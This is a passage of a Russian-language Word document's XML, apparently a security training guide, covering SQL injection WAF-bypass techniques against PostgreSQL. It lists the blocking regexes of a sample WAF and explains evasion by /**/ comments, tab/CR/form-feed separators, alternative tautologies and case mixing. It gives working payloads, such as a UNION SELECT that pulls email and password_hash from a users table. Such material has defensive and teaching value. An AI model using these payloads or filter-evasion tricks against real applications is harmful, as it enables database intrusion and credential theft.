        <w:t>PostgreSQL Docs: String Functions and Operators — decode / encode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340A1BA0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: String Functions and Operators — convert_from / convert_to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D2866C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Binary Data Types — bytea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617B80AC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Character Set Support — supported encodings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A044377" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection cheat sheet — string encoding bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709D1C2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — convert_from / decode bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564EAC0F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.9.6 Регистр keywords, whitespace tricks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232BA0D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код — см. 3.9.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC5B5A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что блокирует фильтр.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> В отличие от 3.9.1–3.9.5, где приёмы маскируют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>содержимое</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> строкового литерала или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>имя функции</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 3.9.6 атакует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>разделитель токенов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>регистр ключевых слов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — то есть саму форму, в которой WAF ищет паттерн.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD61923" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Из WAF 3.9.0 — конкретные правила:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128F3546" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bUNION\s+SELECT\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\s+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> между </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Если разделитель — не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-класс (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или NUL), правило не срабатывает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFB84F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'\s*(OR|AND)\s+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — требует пробел после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r>
        <w:t>. Та же тактика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E27C21B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR\s+1\s*=\s*1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — точечная сигнатура классической тавтологии. Эквивалентная по смыслу, но другой формы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR 2&lt;3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR NULL IS NULL</w:t>
      </w:r>
      <w:r>
        <w:t>) фильтр пропускает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164E5443" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bDROP|TRUNCATE|GRANT|CREATE|ALTER\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3.9.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> идёт с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re.IGNORECASE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, и case-mixing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не помогает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Но в чужих blacklist-ах (Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if "DROP" in q.upper()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — правильно, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if "DROP" in q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — уязвимо) — помогает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560348A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Принципиальное ограничение 3.9.6 в отличие от 3.9.1–3.9.5: эти приёмы работают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только если точка инъекции вне строкового литерала</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или payload содержит </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">синтаксис, который должен парситься PG как SQL. Если фильтр блокирует сами имена/значения внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-литерала — нужно 3.9.2/3.9.3/3.9.4/3.9.5. 3.9.6 — про то, как протолкнуть payload, в котором </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> уже есть текстом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570654D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — `/**/` как разделитель токенов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F12B06" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст — WAF 3.9.0 блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Заменяем все </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> между ключевыми словами на пустой комментарий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470C4F22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E44AFE8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x'/**/UNION/**/SELECT/**/id,/**/email,/**/password_hash/**/FROM/**/users/**/WHERE/**/1/**/=/**/1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1D27FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Однако WAF 3.9.0 содержит правило </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--|/\*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (блокирует любые SQL-комментарии). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> его тоже триггерит — нужно либо обходить это правило заодно (см. ниже), либо ограничиться tab/CR (Payload B).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359393B6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В сценарии, где WAF блокирует только UNION-сигнатуру и тавтологию (не комментарии — частый случай у самописных blacklist-ов), payload работает напрямую. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79968A8D"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'x'/**/UNION/**/SELECT/**/id,/**/email,/**/password_hash/**/FROM/**/users/**/WHERE/**/1/**/=/**/1--'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4E3078" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PG-лексер обрабатывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* ... */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (включая пустой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) как block-comment и удаляет его из потока токенов. Парсер видит эквивалент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>... UNION SELECT id, email, password_hash FROM users WHERE 1=1 --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. WAF-regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bUNION\s+SELECT\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не срабатывает: между </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> стоит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\s</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A63F24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Когда WAF блокирует ещё и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/\*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (как в 3.9.0) — нужен Payload B (tab/CR) либо комбинация с 3.9.1 (упаковать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO</w:t>
      </w:r>
      <w:r>
        <w:t>-блок с dollar-quoted dynamic SQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D10FDD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — tab / CR / form-feed как разделитель</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605A4535" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL Lexical Structure §4.1.1 явно перечисляет, что считается whitespace на уровне лексера: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>space (0x20), tab (0x09), newline (0x0A), CR (0x0D), form feed (0x0C)</w:t>
      </w:r>
      <w:r>
        <w:t>. Любой из них корректно разделяет токены.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021DFDBD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если WAF использует Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без флага </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re.ASCII</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, то Python трактует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[ \t\n\r\f\v]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — таб и newline покрываются. Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bytes-level фильтры</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на старых ModSecurity (CRS до v3 с операторами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t:none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) обрабатывают только литеральный байт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. URL-encoded tab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%09</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после URL-decode превращается в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (0x09); PG его как whitespace принимает, WAF не распознал как разделитель и не сработал на сигнатуре.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539BFC53" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
